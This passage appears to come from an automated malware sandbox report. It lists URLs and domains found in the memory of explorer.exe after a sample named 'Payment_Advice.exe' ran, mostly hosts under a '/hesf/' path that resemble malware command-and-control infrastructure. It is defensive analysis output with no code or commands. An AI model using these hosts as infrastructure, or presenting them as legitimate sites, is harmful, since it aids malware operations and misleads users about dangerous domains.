          Source: explorer.exe, 0000000F.00000002.3853009126.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.1585353154.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000002.3853115679.0000000007720000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: Payment_Advice.exe, 00000000.00000003.1414188164.000000000789D000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
          Source: Payment_Advice.exe, 00000000.00000003.1414188164.000000000789D000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.1320detailingsupplies.com
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.1320detailingsupplies.com/hesf/
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.1320detailingsupplies.com/hesf/www.jf66899j.com
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.1320detailingsupplies.comReferer:
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.87b52.club
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.87b52.club/hesf/
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.87b52.club/hesf/www.svgco.life
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.87b52.clubReferer:
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.91fulizifen.com
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.91fulizifen.com/hesf/
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.91fulizifen.com/hesf/www.pendletonofficial.shop
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.91fulizifen.comReferer:
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brownkrosshui.com
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brownkrosshui.com/hesf/
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brownkrosshui.com/hesf/www.usbulletinnow.com
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brownkrosshui.comReferer:
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.homespy.net
          Source: explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.homespy.net/hesf/
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.homespy.netReferer:
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.im-newbie-journal.online
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.im-newbie-journal.online/hesf/
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.im-newbie-journal.online/hesf/www.tygyro.com
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.im-newbie-journal.onlineReferer:
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jf66899j.com
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jf66899j.com/hesf/
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jf66899j.com/hesf/www.jimenezfarmersinsurance.shop
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jf66899j.comReferer:
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jimenezfarmersinsurance.shop
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jimenezfarmersinsurance.shop/hesf/
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jimenezfarmersinsurance.shop/hesf/www.homespy.net
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jimenezfarmersinsurance.shopReferer:
          Source: explorer.exe, 0000000F.00000003.2284163967.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3856158250.0000000009237000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.othersidewear.com
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.othersidewear.com/hesf/
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.othersidewear.com/hesf/www.91fulizifen.com
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.othersidewear.comReferer:
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pancakesandwaflesbeverages.net
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pancakesandwaflesbeverages.net/hesf/
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pancakesandwaflesbeverages.net/hesf/www.schistdisc.com
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pancakesandwaflesbeverages.netReferer:
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pendletonofficial.shop
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pendletonofficial.shop/hesf/
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pendletonofficial.shop/hesf/www.shayun.net
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pendletonofficial.shopReferer:
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.schistdisc.com
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.schistdisc.com/hesf/
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.schistdisc.com/hesf/www.1320detailingsupplies.com
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.schistdisc.comReferer:
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.shayun.net
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.shayun.net/hesf/
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.shayun.net/hesf/www.brownkrosshui.com
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.shayun.netReferer:
